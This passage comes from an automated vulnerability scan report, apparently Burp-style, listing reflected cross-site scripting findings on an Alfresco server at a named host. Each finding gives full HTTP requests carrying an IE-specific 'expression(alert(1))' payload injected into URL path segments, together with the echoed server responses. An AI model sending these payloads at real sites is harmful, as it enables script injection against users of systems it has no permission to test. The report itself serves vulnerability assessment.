Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 30 Sep 2011 13:12:45 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 12511
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head><title>Alfresco Web Client - System Error</title>
<link rel="sear
...[SNIP]...
<a href='/alfresco/d/d/workspace/SpacesStore28ddb'style='x:expression(alert(1))'506c04e974b/52f86e83-c9fb-11dd-9053-776d2787bb9c/Caribbeanthumb1.jpg'>
...[SNIP]...

2.15. http://admin.paradizo.com/alfresco/d/d/workspace/SpacesStore/52f86e83-c9fb-11dd-9053-776d2787bb9c/Caribbeanthumb1.jpg [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admin.paradizo.com
Path:   /alfresco/d/d/workspace/SpacesStore/52f86e83-c9fb-11dd-9053-776d2787bb9c/Caribbeanthumb1.jpg

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 60cb3'style%3d'x%3aexpression(alert(1))'1fa8eeadee5 was submitted in the REST URL parameter 6. This input was echoed as 60cb3'style='x:expression(alert(1))'1fa8eeadee5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /alfresco/d/d/workspace/SpacesStore/52f86e83-c9fb-11dd-9053-776d2787bb9c60cb3'style%3d'x%3aexpression(alert(1))'1fa8eeadee5/Caribbeanthumb1.jpg?guest=true HTTP/1.1
Host: admin.paradizo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://paradizo.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 30 Sep 2011 13:12:52 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 12511
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head><title>Alfresco Web Client - System Error</title>
<link rel="sear
...[SNIP]...
<a href='/alfresco/d/d/workspace/SpacesStore/52f86e83-c9fb-11dd-9053-776d2787bb9c60cb3'style='x:expression(alert(1))'1fa8eeadee5/Caribbeanthumb1.jpg'>
...[SNIP]...

2.16. http://admin.paradizo.com/alfresco/d/d/workspace/SpacesStore/748e6e4f-9a83-479e-b964-923bd18e00af/maldonado-region-thumb.jpg [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admin.paradizo.com
Path:   /alfresco/d/d/workspace/SpacesStore/748e6e4f-9a83-479e-b964-923bd18e00af/maldonado-region-thumb.jpg

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c3962'style%3d'x%3aexpression(alert(1))'dc50aef9f43 was submitted in the REST URL parameter 4. This input was echoed as c3962'style='x:expression(alert(1))'dc50aef9f43 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /alfresco/d/d/workspacec3962'style%3d'x%3aexpression(alert(1))'dc50aef9f43/SpacesStore/748e6e4f-9a83-479e-b964-923bd18e00af/maldonado-region-thumb.jpg?guest=true HTTP/1.1
Host: admin.paradizo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://paradizo.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 30 Sep 2011 13:12:37 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 12518
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head><title>Alfresco Web Client - System Error</title>
<link rel="sear
...[SNIP]...
<a href='/alfresco/d/d/workspacec3962'style='x:expression(alert(1))'dc50aef9f43/SpacesStore/748e6e4f-9a83-479e-b964-923bd18e00af/maldonado-region-thumb.jpg'>
...[SNIP]...

2.17. http://admin.paradizo.com/alfresco/d/d/workspace/SpacesStore/748e6e4f-9a83-479e-b964-923bd18e00af/maldonado-region-thumb.jpg [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admin.paradizo.com
Path:   /alfresco/d/d/workspace/SpacesStore/748e6e4f-9a83-479e-b964-923bd18e00af/maldonado-region-thumb.jpg

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b61ae'style%3d'x%3aexpression(alert(1))'8390225a861 was submitted in the REST URL parameter 5. This input was echoed as b61ae'style='x:expression(alert(1))'8390225a861 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /alfresco/d/d/workspace/SpacesStoreb61ae'style%3d'x%3aexpression(alert(1))'8390225a861/748e6e4f-9a83-479e-b964-923bd18e00af/maldonado-region-thumb.jpg?guest=true HTTP/1.1
Host: admin.paradizo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://paradizo.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 30 Sep 2011 13:12:44 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 12518
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head><title>Alfresco Web Client - System Error</title>
<link rel="sear
...[SNIP]...
<a href='/alfresco/d/d/workspace/SpacesStoreb61ae'style='x:expression(alert(1))'8390225a861/748e6e4f-9a83-479e-b964-923bd18e00af/maldonado-region-thumb.jpg'>
...[SNIP]...

2.18. http://admin.paradizo.com/alfresco/d/d/workspace/SpacesStore/748e6e4f-9a83-479e-b964-923bd18e00af/maldonado-region-thumb.jpg [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admin.paradizo.com
Path:   /alfresco/d/d/workspace/SpacesStore/748e6e4f-9a83-479e-b964-923bd18e00af/maldonado-region-thumb.jpg

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 200a1'style%3d'x%3aexpression(alert(1))'ca6a8479f3c was submitted in the REST URL parameter 6. This input was echoed as 200a1'style='x:expression(alert(1))'ca6a8479f3c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /alfresco/d/d/workspace/SpacesStore/748e6e4f-9a83-479e-b964-923bd18e00af200a1'style%3d'x%3aexpression(alert(1))'ca6a8479f3c/maldonado-region-thumb.jpg?guest=true HTTP/1.1
Host: admin.paradizo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://paradizo.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 30 Sep 2011 13:12:49 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 12518
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head><title>Alfresco Web Client - System Error</title>
<link rel="sear
...[SNIP]...
<a href='/alfresco/d/d/workspace/SpacesStore/748e6e4f-9a83-479e-b964-923bd18e00af200a1'style='x:expression(alert(1))'ca6a8479f3c/maldonado-region-thumb.jpg'>
...[SNIP]...

2.19. http://admin.paradizo.com/alfresco/d/d/workspace/SpacesStore/97c74228-cb60-11dd-95ac-937877940723/switzerlandthumb1.jpg [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admin.paradizo.com
Path:   /alfresco/d/d/workspace/SpacesStore/97c74228-cb60-11dd-95ac-937877940723/switzerlandthumb1.jpg

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 504ac'style%3d'x%3aexpression(alert(1))'2bf498bd1e5 was submitted in the REST URL parameter 4. This input was echoed as 504ac'style='x:expression(alert(1))'2bf498bd1e5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /alfresco/d/d/workspace504ac'style%3d'x%3aexpression(alert(1))'2bf498bd1e5/SpacesStore/97c74228-cb60-11dd-95ac-937877940723/switzerlandthumb1.jpg?guest=true HTTP/1.1
Host: admin.paradizo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://paradizo.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 30 Sep 2011 13:12:39 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 12513
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head><title>Alfresco Web Client - System Error</title>
<link rel="sear
...[SNIP]...
<a href='/alfresco/d/d/workspace504ac'style='x:expression(alert(1))'2bf498bd1e5/SpacesStore/97c74228-cb60-11dd-95ac-937877940723/switzerlandthumb1.jpg'>
...[SNIP]...

2.20. http://admin.paradizo.com/alfresco/d/d/workspace/SpacesStore/97c74228-cb60-11dd-95ac-937877940723/switzerlandthumb1.jpg [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admin.paradizo.com
Path:   /alfresco/d/d/workspace/SpacesStore/97c74228-cb60-11dd-95ac-937877940723/switzerlandthumb1.jpg

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7b76c'style%3d'x%3aexpression(alert(1))'93374b37280 was submitted in the REST URL parameter 6. This input was echoed as 7b76c'style='x:expression(alert(1))'93374b37280 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /alfresco/d/d/workspace/SpacesStore/97c74228-cb60-11dd-95ac-9378779407237b76c'style%3d'x%3aexpression(alert(1))'93374b37280/switzerlandthumb1.jpg?guest=true HTTP/1.1
Host: admin.paradizo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://paradizo.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 30 Sep 2011 13:12:48 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 12513
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head><title>Alfresco Web Client - System Error</title>
<link rel="sear
...[SNIP]...
<a href='/alfresco/d/d/workspace/SpacesStore/97c74228-cb60-11dd-95ac-9378779407237b76c'style='x:expression(alert(1))'93374b37280/switzerlandthumb1.jpg'>
...[SNIP]...

2.21. http://admin.paradizo.com/alfresco/d/d/workspace/SpacesStore/b348cfb5-72d5-4cca-b1ba-386470d0d8e1/BRITISH%20COLUMBIA%20THUMBNAIL%201.jpg [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admin.paradizo.com
Path:   /alfresco/d/d/workspace/SpacesStore/b348cfb5-72d5-4cca-b1ba-386470d0d8e1/BRITISH%20COLUMBIA%20THUMBNAIL%201.jpg

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d1aa5'style%3d'x%3aexpression(alert(1))'7ce3adef153 was submitted in the REST URL parameter 4. This input was echoed as d1aa5'style='x:expression(alert(1))'7ce3adef153 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /alfresco/d/d/workspaced1aa5'style%3d'x%3aexpression(alert(1))'7ce3adef153/SpacesStore/b348cfb5-72d5-4cca-b1ba-386470d0d8e1/BRITISH%20COLUMBIA%20THUMBNAIL%201.jpg?guest=true HTTP/1.1
Host: admin.paradizo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://paradizo.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 30 Sep 2011 13:12:46 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 12530
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head><title>Alfresco Web Client - System Error</title>
<link rel="sear
...[SNIP]...
<a href='/alfresco/d/d/workspaced1aa5'style='x:expression(alert(1))'7ce3adef153/SpacesStore/b348cfb5-72d5-4cca-b1ba-386470d0d8e1/BRITISH%20COLUMBIA%20THUMBNAIL%201.jpg'>
...[SNIP]...

2.22. http://admin.paradizo.com/alfresco/d/d/workspace/SpacesStore/b348cfb5-72d5-4cca-b1ba-386470d0d8e1/BRITISH%20COLUMBIA%20THUMBNAIL%201.jpg [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admin.paradizo.com
Path:   /alfresco/d/d/workspace/SpacesStore/b348cfb5-72d5-4cca-b1ba-386470d0d8e1/BRITISH%20COLUMBIA%20THUMBNAIL%201.jpg

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1c621'style%3d'x%3aexpression(alert(1))'1ccb0cabad3 was submitted in the REST URL parameter 5. This input was echoed as 1c621'style='x:expression(alert(1))'1ccb0cabad3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /alfresco/d/d/workspace/SpacesStore1c621'style%3d'x%3aexpression(alert(1))'1ccb0cabad3/b348cfb5-72d5-4cca-b1ba-386470d0d8e1/BRITISH%20COLUMBIA%20THUMBNAIL%201.jpg?guest=true HTTP/1.1
Host: admin.paradizo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://paradizo.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 30 Sep 2011 13:12:52 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 12530
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head><title>Alfresco Web Client - System Error</title>
<link rel="sear
...[SNIP]...
<a href='/alfresco/d/d/workspace/SpacesStore1c621'style='x:expression(alert(1))'1ccb0cabad3/b348cfb5-72d5-4cca-b1ba-386470d0d8e1/BRITISH%20COLUMBIA%20THUMBNAIL%201.jpg'>
...[SNIP]...

2.23. http://admin.paradizo.com/alfresco/d/d/workspace/SpacesStore/b348cfb5-72d5-4cca-b1ba-386470d0d8e1/BRITISH%20COLUMBIA%20THUMBNAIL%201.jpg [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admin.paradizo.com
Path:   /alfresco/d/d/workspace/SpacesStore/b348cfb5-72d5-4cca-b1ba-386470d0d8e1/BRITISH%20COLUMBIA%20THUMBNAIL%201.jpg

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 299d9'style%3d'x%3aexpression(alert(1))'30f45f865f5 was submitted in the REST URL parameter 6. This input was echoed as 299d9'style='x:expression(alert(1))'30f45f865f5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /alfresco/d/d/workspace/SpacesStore/b348cfb5-72d5-4cca-b1ba-386470d0d8e1299d9'style%3d'x%3aexpression(alert(1))'30f45f865f5/BRITISH%20COLUMBIA%20THUMBNAIL%201.jpg?guest=true HTTP/1.1
Host: admin.paradizo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://paradizo.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 30 Sep 2011 13:12:58 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 12530
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head><title>Alfresco Web Client - System Error</title>
<link rel="sear
...[SNIP]...
<a href='/alfresco/d/d/workspace/SpacesStore/b348cfb5-72d5-4cca-b1ba-386470d0d8e1299d9'style='x:expression(alert(1))'30f45f865f5/BRITISH%20COLUMBIA%20THUMBNAIL%201.jpg'>
...[SNIP]...

2.24. http://admin.paradizo.com/alfresco/d/d/workspace/SpacesStore/c562b420-c9fa-11dd-9053-776d2787bb9c/Canada-thumb1.jpg [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admin.paradizo.com
Path:   /alfresco/d/d/workspace/SpacesStore/c562b420-c9fa-11dd-9053-776d2787bb9c/Canada-thumb1.jpg

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6af06'style%3d'x%3aexpression(alert(1))'e292bf09ef4 was submitted in the REST URL parameter 4. This input was echoed as 6af06'style='x:expression(alert(1))'e292bf09ef4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /alfresco/d/d/workspace6af06'style%3d'x%3aexpression(alert(1))'e292bf09ef4/SpacesStore/c562b420-c9fa-11dd-9053-776d2787bb9c/Canada-thumb1.jpg?guest=true HTTP/1.1
Host: admin.paradizo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://paradizo.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 30 Sep 2011 13:12:42 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 12509
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head><title>Alfresco Web Client - System Error</title>
<link rel="sear
...[SNIP]...
<a href='/alfresco/d/d/workspace6af06'style='x:expression(alert(1))'e292bf09ef4/SpacesStore/c562b420-c9fa-11dd-9053-776d2787bb9c/Canada-thumb1.jpg'>
...[SNIP]...

2.25. http://admin.paradizo.com/alfresco/d/d/workspace/SpacesStore/c562b420-c9fa-11dd-9053-776d2787bb9c/Canada-thumb1.jpg [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admin.paradizo.com
Path:   /alfresco/d/d/workspace/SpacesStore/c562b420-c9fa-11dd-9053-776d2787bb9c/Canada-thumb1.jpg

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload be65d'style%3d'x%3aexpression(alert(1))'316d2ec362 was submitted in the REST URL parameter 5. This input was echoed as be65d'style='x:expression(alert(1))'316d2ec362 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /alfresco/d/d/workspace/SpacesStorebe65d'style%3d'x%3aexpression(alert(1))'316d2ec362/c562b420-c9fa-11dd-9053-776d2787bb9c/Canada-thumb1.jpg?guest=true HTTP/1.1
Host: admin.paradizo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://paradizo.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 30 Sep 2011 13:12:48 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 12504
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head><title>Alfresco Web Client - System Error</title>
<link rel="sear
...[SNIP]...
<a href='/alfresco/d/d/workspace/SpacesStorebe65d'style='x:expression(alert(1))'316d2ec362/c562b420-c9fa-11dd-9053-776d2787bb9c/Canada-thumb1.jpg'>
...[SNIP]...

2.26. http://admin.paradizo.com/alfresco/d/d/workspace/SpacesStore/c562b420-c9fa-11dd-9053-776d2787bb9c/Canada-thumb1.jpg [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admin.paradizo.com
Path:   /alfresco/d/d/workspace/SpacesStore/c562b420-c9fa-11dd-9053-776d2787bb9c/Canada-thumb1.jpg

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f268c'style%3d'x%3aexpression(alert(1))'d3936d59f09 was submitted in the REST URL parameter 6. This input was echoed as f268c'style='x:expression(alert(1))'d3936d59f09 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /alfresco/d/d/workspace/SpacesStore/c562b420-c9fa-11dd-9053-776d2787bb9cf268c'style%3d'x%3aexpression(alert(1))'d3936d59f09/Canada-thumb1.jpg?guest=true HTTP/1.1
Host: admin.paradizo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://paradizo.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 30 Sep 2011 13:12:54 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 12509
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head><title>Alfresco Web Client - System Error</title>
<link rel="sear
...[SNIP]...
<a href='/alfresco/d/d/workspace/SpacesStore/c562b420-c9fa-11dd-9053-776d2787bb9cf268c'style='x:expression(alert(1))'d3936d59f09/Canada-thumb1.jpg'>
...[SNIP]...

2.27. http://admin.paradizo.com/alfresco/d/d/workspace/SpacesStore/e91137de-5ec9-482e-a154-b55e1f592129/st%20barts%20thumb.jpg [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admin.paradizo.com
Path:   /alfresco/d/d/workspace/SpacesStore/e91137de-5ec9-482e-a154-b55e1f592129/st%20barts%20thumb.jpg

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7c537'style%3d'x%3aexpression(alert(1))'e367829ebed was submitted in the REST URL parameter 4. This input was echoed as 7c537'style='x:expression(alert(1))'e367829ebed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /alfresco/d/d/workspace7c537'style%3d'x%3aexpression(alert(1))'e367829ebed/SpacesStore/e91137de-5ec9-482e-a154-b55e1f592129/st%20barts%20thumb.jpg?guest=true HTTP/1.1
Host: admin.paradizo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://paradizo.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 30 Sep 2011 13:12:43 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 12514
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head><title>Alfresco Web Client - System Error</title>
<link rel="sear
...[SNIP]...
<a href='/alfresco/d/d/workspace7c537'style='x:expression(alert(1))'e367829ebed/SpacesStore/e91137de-5ec9-482e-a154-b55e1f592129/st%20barts%20thumb.jpg'>
...[SNIP]...

2.28. http://admin.paradizo.com/alfresco/d/d/workspace/SpacesStore/e91137de-5ec9-482e-a154-b55e1f592129/st%20barts%20thumb.jpg [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admin.paradizo.com
Path:   /alfresco/d/d/workspace/SpacesStore/e91137de-5ec9-482e-a154-b55e1f592129/st%20barts%20thumb.jpg

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d66f5'style%3d'x%3aexpression(alert(1))'245274776c4 was submitted in the REST URL parameter 5. This input was echoed as d66f5'style='x:expression(alert(1))'245274776c4 in the application's response.

